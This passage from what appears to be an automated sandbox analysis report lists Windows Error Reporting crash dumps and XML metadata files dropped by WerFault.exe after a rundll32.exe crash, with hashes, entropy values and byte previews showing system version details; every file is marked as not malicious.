SHA-256:	D3FE52F0F4EF659030D4444803F215F26E66FACD398ECED19729B17F3FBCD86A
SHA-512:	0983648C097B7444E58C6005B863CD1ABAC7E2192BF7AE3FFFDFD4D532A81D00547CFAFD41B61271E40B3DF314938E3099C78C39AEB6EB3049459B5FC44B500D
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.9.9.9.7.1.5.9.0.9.8.3.1.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.9.9.9.7.1.6.0.2.3.8.9.3.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.7.b.a.8.5.0.-.e.6.f.6.-.4.7.1.f.-.a.f.2.e.-.6.a.c.6.2.3.e.8.4.4.0.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.8.2.b.4.0.f.-.7.a.4.f.-.4.f.d.e.-.9.9.7.1.-.0.6.e.5.7.e.d.a.6.7.d.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.3.8.-.0.0.0.1.-.0.0.1.a.-.7.0.e.3.-.b.2.2.e.9.e.9.3.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1714.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed May 31 08:59:10 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	36014
Entropy (8bit):	2.3565124382333593
Encrypted:	false
SSDEEP:	192:kOd8rZ6Vchj7RqzvcCO5SkbL+TtcnMmkGlvMYwYvkdNXTn:IFjo45LbL+T+nMmkGlvJvkdl
MD5:	0F6EEC80C94DB64381D5DB6B71AA90B1
SHA1:	217E75E0AD88A492F4E585714E3C9F3B65C11971
SHA-256:	EA733CC46783AA8A9C85BBA33FEDA6E47C8FB430C532B32C5078D82FD6F0E2CE
SHA-512:	15E6A6A3B3C315473146183D215F4AA615EF735B6A807FF71E032174736A771006A58CAB23DAFF0898AC175E48A7BE11DED7BA1F785C013F202F9D141CAEA904
Malicious:	false
Preview:	MDMP....... .......^.wd............d...............l............)..........T.......8...........T...........P...^r...........................................................................................U...........B..............GenuineIntelW...........T...........].wd.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1763.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed May 31 08:59:10 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	35650
Entropy (8bit):	2.39521596273267
Encrypted:	false
SSDEEP:	192:klr8rZ6Vchj0RhivSO5Skb8+TFCzid5oQFsUta5utGGIwttY+:1FjuA5Lb8+TFAidB1tEwY
MD5:	B2288462AD98709F1246FEE69FDF7A76
SHA1:	D3ECE985125FE76AD648C4CCA767376977901C3E
SHA-256:	58599D46929C56E25DD0E889EC87751583F89A70B0CD87EDE37FA181198A0942
SHA-512:	84949F4F386C6A2D33A196DDC701FEFE6FB73AAC4858C231BAC02A1AAF6E9BBEC2CE0DBF48ED36CBB1C57C3229B7832000676091EDF4341DDCA44907EB51FC0B
Malicious:	false
Preview:	MDMP....... .......^.wd............d...............l............)..........T.......8...........T...............Bq...........................................................................................U...........B..............GenuineIntelW...........T...........\.wd.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1909.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8240
Entropy (8bit):	3.6911710563593108
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNikd67zX6Y1c6ngmfTOSfYCprl89br4sfXZm:RrlsNiO6v6YO6ngmfTOSarrfE
MD5:	5B6947C71EEFCA9294A5E69F11499F1E
SHA1:	17CCC788F845C4512FD509144940EE072BEB5601
SHA-256:	C05DD659C9AA7B606126D95DE710FFEA4122D3FCB01750D5D9602616DC55A665
SHA-512:	E2C960BB49E7BA48B80DE3441480646D7F10402972178ED0C514DC217502732E6B42037D277D52D62DADF0F9934CED4AE3007E3D9E16B3D3B4FA3125ED8D3A4B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.5.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1929.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8242
Entropy (8bit):	3.6923306800014446
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiP567zd6YeP69gmfTOSfYCprv89brSsfSZm:RrlsNih6V6YG69gmfTOSIrRfl
MD5:	AAA6990AA9B5300E54EAD151955099C4
SHA1:	28CA8BD7ED76CA9CC0BAD3AC4E3FAD1BC36A1BA6
SHA-256:	6CA37B9E94AE7E1918C34B905213486ADCCD9837AE7A44C3473A1CC5FE4DF1D0
SHA-512:	A12CB5E6684A68C8569608686D404D77CB3E5C0E6088F1010345ECB23C2026712AB3EE99CAF3A6E83FE7EE7BB3027BEDDE00EA05EE97BABB2F695ECB898ADD05
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.4.<./.P.i.d.>.........

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1939.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4626
Entropy (8bit):	4.450765755369854
Encrypted:	false
SSDEEP:	48:cvIwSD8zs6KJgtWI9igmaWgc8sqYjW8fm8M4JCdsEZFbx+q8/vKD4SrS8d:uITf6YFgmbgrsqYHJivxUkDW8d
MD5:	FB8398C5D49E57B61873F7836968D4F4
SHA1:	5633552D1F9423A88ADEE57A82EA2EBCE6D61E14
SHA-256:	D70984202B8484F2D7FD8E88E359214268EFCFA821B859E761CF66DAFBFBB9B5
SHA-512:	24A4D9BF04DD133C7805D79D068DDA624714F075F184EFE25F23336ABA6CFA1A932691C9CF7C804CC1B47E4CC2BF336E96F2C5BE627C251033F3B0C337157DCF
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2064609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1959.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4626
Entropy (8bit):	4.454945419149455
Encrypted:	false
SSDEEP:	48:cvIwSD8zs6KJgtWI9igmaWgc8sqYj68fm8M4JCdsEZFss+q8/vKN4SrSXd:uITf6YFgmbgrsqYTJiAsUiDWXd
MD5:	DB97EEF771B452F9F7F176B7133B104C
SHA1:	D4741EE267B9078C48E47A0DF29B7C51A29BB48D
SHA-256:	8A4FFE279B80049C8C908AD7C1BF6EFAC8EA25B04370A8A75F8DED341967BE8E
SHA-512:	1E5F38B34D1326F01E879D8491561781E1239D62950015A22BBCCD792B3C2E693118E9A6CA8AFD44AB7282A9FC8971DFF7E26D817D303E1A64CFD6B3A37E5B37
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2064609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C42.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed May 31 08:59:15 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	36982
Entropy (8bit):	2.28604369303349
Encrypted:	false
SSDEEP:	192:N/x8rZ6Vchj6RB7n3O5SkbKu78+Tk1yshiQCkbVk/f:4Fjo7ne5LbKu78+T/sQQCF
MD5:	65A79580193316F00B9537DBD05C759A
SHA1:	0509C86D177199C6890E8AB128295AE15DE40154
SHA-256:	6C1C539FCBB6B74AE4C8BC1F8987FAECDD78C84EB224961A0C0775843CA8203D
SHA-512:	E7C2ABCE84ADD40BC31C5BC5DAF5E7613C464E0583B78A29444FF4B3F8DF5EAA5865C37F4DF1B94FEAC6FBEDA89BF2DBAB1349B9B89AB403D71D71E7151D88E4
Malicious:	false
Preview:	MDMP....... .......c.wd............d...............l............)..........T.......8...........T...............vv...........................................................................................U...........B..............GenuineIntelW...........T.......<...c.wd.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D9B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8244
Entropy (8bit):	3.6926274115897813
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiDh67zH6Yet6FYgmfTuSfYCprr89bGYsfSaim:RrlsNil6/6Yk66gmfTuSEGLfF
MD5:	C2FACDC90DF657E2D952EAAEE86E3C89
SHA1:	CBFCD29AB470F56489FFFCFA461C9555362B1159
SHA-256:	39216B1B99C1CCE1DFE64F369DD915A64744D3809D81817CDE046D5BA4029042
SHA-512:	D1EBA428570DCF2C48DFF0ABAA6E4D2C89ED7FC65856AFAE7C3D988B42FFB69213A9A8AB0DB7598C614EFB3709BDF930015A372168BBE09B34D79353BA13A81E
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.1.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E09.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4626
Entropy (8bit):	4.453884983142049
Encrypted:	false
SSDEEP:	48:cvIwSD8zs6KJgtWI9igmaWgc8sqYjR8fm8M4JCdsE9Fw+q8/v8k4SrSy6d:uITf6YFgmbgrsqYyJioUFDWy6d
MD5:	B99FB9C9DA6B1260791A2D2A17CE49B6
SHA1:	AB738A440D002E5117FF322432EC5F0261272173
SHA-256:	2A98C2BD601204628AADB7EA22BABACB3B1B561E6FF170503E30811CDF70E25F
SHA-512:	C24AC4AB7EA8C88170FEA97E17DFD678F5CD04C611F0192D9376DBF2DC8097C64B72037D85D33548FDE9824275B4745E5B99E054A90A23CFBF96959FD384783A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2064609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER39A0.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed May 31 08:59:19 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	37518
Entropy (8bit):	2.2657648227128058
Encrypted:	false
SSDEEP:	192:asfR8rZ6VchjwRS0MO5SkbpN+TPdaTnTVmSf:a5FjKD5LbpN+TPdaTTVv
MD5:	0C8EEBD2872DD5C0CAD3638A7A96EAA1
SHA1:	6207DBB3BBFB122838A43BB2024B90055C8D9B2B
SHA-256:	4810ED7B6A069EC1BAAAC5654C94F8EDDDC200FF9F7D02DD093DAD43A70DF5E8
SHA-512:	DA2178DEB669B242BF0F581CA9AE9C44CA747FA119D5786B48ACCC7F5C0BE086ABA112CA5A8170D74338B9250EF040BE51E3B08AB43B902B8C0DDEB3F92EA4A4
Malicious:	false
Preview:	MDMP....... .......g.wd............d...............l............)..........T.......8...........T................x...........................................................................................U...........B..............GenuineIntelW...........T...........f.wd.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER39CF.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed May 31 08:59:19 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	44074
Entropy (8bit):	2.117624747538192
Encrypted:	false
SSDEEP:	192:asAfDbUX+dxdK3O5Skb3huQm+T2Oe6aZwdpMsnV:aO+Ye5Lb3hI+T2Oe620
MD5:	3270832A2753A6BFAB4F073274509DE0
SHA1:	C3045AA4DCE5E48FEE972ED5ADE713CCB2A256EE
SHA-256:	8D4860E0D6CFA7338BCF252CBF79A19A6D29D60AB9C6F70E2119F3A026EAA3D3
SHA-512:	B9D760F4E8E0C53F56DE9FA6E6C91E5995BE2BAB19218561E28F0E4AE4F38E3C23543A05B4114913CDC50AE718229BF8CE52737B555EE2FCBFA595D0A65E2553
Malicious:	false
Preview:	MDMP....... .......g.wd.........................................,..........T.......8...........T...............*...........0................................................................................U...........B..............GenuineIntelW...........T.......8...f.wd.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B86.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8238
Entropy (8bit):	3.6893195807327688
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNini6f6YOQb6dSgmfTOSfYCprz89baosf/a+m:RrlsNii6f6YDb6YgmfTOScabfS
MD5:	E60EEA97EE99D59780663EDEE0DE8460
SHA1:	143927A3FED2B5C78BE518CBA7823CC6938F5E51
SHA-256:	F813575214C37193722F72B315A6C9FC6AAB768CF766F8E43BAB4B7B7AC0391E
SHA-512:	DB79B0991C99438218737851A302255C256CAAF1317F77A99ABF2F25E5B62C21E83C80EFA1F1B71B3D3BF0704CF17E8F0E3DD037D669789F0F4F8C5E0E9F3284
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.1.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B95.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8238
Entropy (8bit):	3.6920155677868385
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi6l67zV6YOQh6dSgmfTuSfYCprv89baTsfm+m:RrlsNio6d6YDh6YgmfTuSIa4fW
MD5:	DE4319E8C441245F384B05B6B5B5C653
SHA1:	6D0B3883B389339DC2E490D8B6BAC4344CFBEE85
SHA-256:	EDC27DAD3A574475430D7E5F56EC95A53F3AEC22D9ADBA23EF2C909877846F9A
SHA-512:	0FADEC2DAC2110B2EAC23F3AA982457E872E62CD64AA93F233259547A8B84BCC7B18CD8A73DEAF5217932F55924282F1777AF54CDDC70910F6B84E1C2D35AF97
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.4.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3BC5.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4626
Entropy (8bit):	4.454121854302584
Encrypted:	false
SSDEEP:	48:cvIwSD8zs6KJgtWI9igmaWgc8sqYjX8fm8M4JCdsEZFm+q8/vKcfq+4SrSLd:uITf6YFgmbgrsqYoJiaUJfDWLd
MD5:	3745DA9156FE27B4ECAA551DA0ED5BF2
SHA1:	303B1E807AD1805551D5D206D2245EBD447A27B1
SHA-256:	F90210E2CBFF38CEDF01586F4DE9C26CDF046B63DF1CB296D1F0ECF6C8D98109
SHA-512:	D2D3F391783ACEAEC17DEDC9F41856CC4E333A1D47DBF3C14BC01706A6B482176C6EDD08118320B67E4ECDF5E3F6763F71510C9B2C869DFBEDF7AFB063924FCD
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2064609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

